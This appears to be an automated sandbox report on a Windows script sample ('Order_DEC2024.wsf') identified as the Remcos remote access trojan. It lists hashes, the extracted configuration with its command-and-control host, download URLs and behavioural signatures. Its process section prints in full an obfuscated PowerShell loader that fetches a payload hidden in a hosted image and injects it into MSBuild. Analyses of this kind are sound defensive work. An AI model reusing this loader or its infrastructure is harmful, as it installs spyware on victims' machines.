Analysis
-
max time kernel
148s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
04-12-2024 06:59
Static task
static1
Behavioral task
behavioral1
Sample
Order_DEC2024.wsf
Resource
win7-20240708-en
General
-
Target
Order_DEC2024.wsf
-
Size
3KB
-
MD5
c209a2bdfa9028df5da14abdc1fc58ce
-
SHA1
17b2e2192cccdde3bc51197285ccdc5a0dc80587
-
SHA256
a2e71163d56c1feb4714e20d8b559bcf005e10b9044d9565afa0e257b0eb4d62
-
SHA512
0d7a39070b32d140bfcf01f125eea94d9016d0e641e461d1d2a8d0b42d5d0cc8388fccc1c08272ed09bde710cbd4154b281e638b9f608e7e0b344d6aa3bd54c9
Malware Config
Extracted
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20
Extracted
remcos
4
lewisham1122.ddnsking.com:6426
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-L31JDJ
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Blocklisted process makes network request 4 IoCs
flow pid Process 4 1608 WScript.exe 9 1608 WScript.exe 20 1684 powershell.exe 27 1684 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation WScript.exe -
pid Process 1684 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1684 set thread context of 4500 1684 powershell.exe 98 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 4 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 9 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1684 powershell.exe 1684 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1684 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4500 MSBuild.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1608 wrote to memory of 1684 1608 WScript.exe 85 PID 1608 wrote to memory of 1684 1608 WScript.exe 85 PID 1684 wrote to memory of 4500 1684 powershell.exe 98 PID 1684 wrote to memory of 4500 1684 powershell.exe 98 PID 1684 wrote to memory of 4500 1684 powershell.exe 98 PID 1684 wrote to memory of 4500 1684 powershell.exe 98 PID 1684 wrote to memory of 4500 1684 powershell.exe 98 PID 1684 wrote to memory of 4500 1684 powershell.exe 98 PID 1684 wrote to memory of 4500 1684 powershell.exe 98 PID 1684 wrote to memory of 4500 1684 powershell.exe 98 PID 1684 wrote to memory of 4500 1684 powershell.exe 98 PID 1684 wrote to memory of 4500 1684 powershell.exe 98
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Order_DEC2024.wsf"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $maremma = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JG5lbmhvID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGFsdm9yb3RhciA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGNob3N0cmEgPSAkYWx2b3JvdGFyLkRvd25sb2FkRGF0YSgkbmVuaG8pOyRwZXJpZ29zYW1lbnRlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNob3N0cmEpOyRtZXhlcm90byA9ICc8PEJBU0U2NF9TVEFSVD4+JzskbHVwYW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JGVuY2FyZGlyID0gJHBlcmlnb3NhbWVudGUuSW5kZXhPZigkbWV4ZXJvdG8pOyRuaXN0byA9ICRwZXJpZ29zYW1lbnRlLkluZGV4T2YoJGx1cGFudGUpOyRlbmNhcmRpciAtZ2UgMCAtYW5kICRuaXN0byAtZ3QgJGVuY2FyZGlyOyRlbmNhcmRpciArPSAkbWV4ZXJvdG8uTGVuZ3RoOyRjdW5ldGEgPSAkbmlzdG8gLSAkZW5jYXJkaXI7JGF1bGljaXNtbyA9ICRwZXJpZ29zYW1lbnRlLlN1YnN0cmluZygkZW5jYXJkaXIsICRjdW5ldGEpOyRkZWJpbGl0YW1lbnRvID0gLWpvaW4gKCRhdWxpY2lzbW8uVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGF1bGljaXNtby5MZW5ndGgpXTskZWxlbWllaXJhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZGViaWxpdGFtZW50byk7JGxldmFkb3VyYSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGVsZW1pZWlyYSk7JGVzY290YSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlc2NvdGEuSW52b2tlKCRudWxsLCBAKCcwL2ZoY3dvL3IvZWUuZXRzYXAvLzpzcHR0aCcsICdiaWNoYW5jcm9zJywgJ2JpY2hhbmNyb3MnLCAnYmljaGFuY3JvcycsICdNU0J1aWxkJywgJ2JpY2hhbmNyb3MnLCAnYmljaGFuY3JvcycsJ2JpY2hhbmNyb3MnLCdiaWNoYW5jcm9zJywnYmljaGFuY3JvcycsJ2JpY2hhbmNyb3MnLCdiaWNoYW5jcm9zJywnMScsJ2JpY2hhbmNyb3MnKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$escumar = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($maremma));Invoke-Expression $escumar2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4500
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD51873ba35a2f7ab5272b20834ed1f1881
SHA1974c471adbfe9dbbd1115ad98fc7e46739aeba2c
SHA256d6e59952dfb57bcda08ceb22b304f745c4cd7833c115bb4c1805049ce6b63e07
SHA51244077de6f55e6cf1c2011efe76448b0d48bbabedc431d9e6ac4f7bcf7ba4f75d73bc29ea22614049b3af10531b73767d4afb92f2ab1c07b6026f5b8855f1c05a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82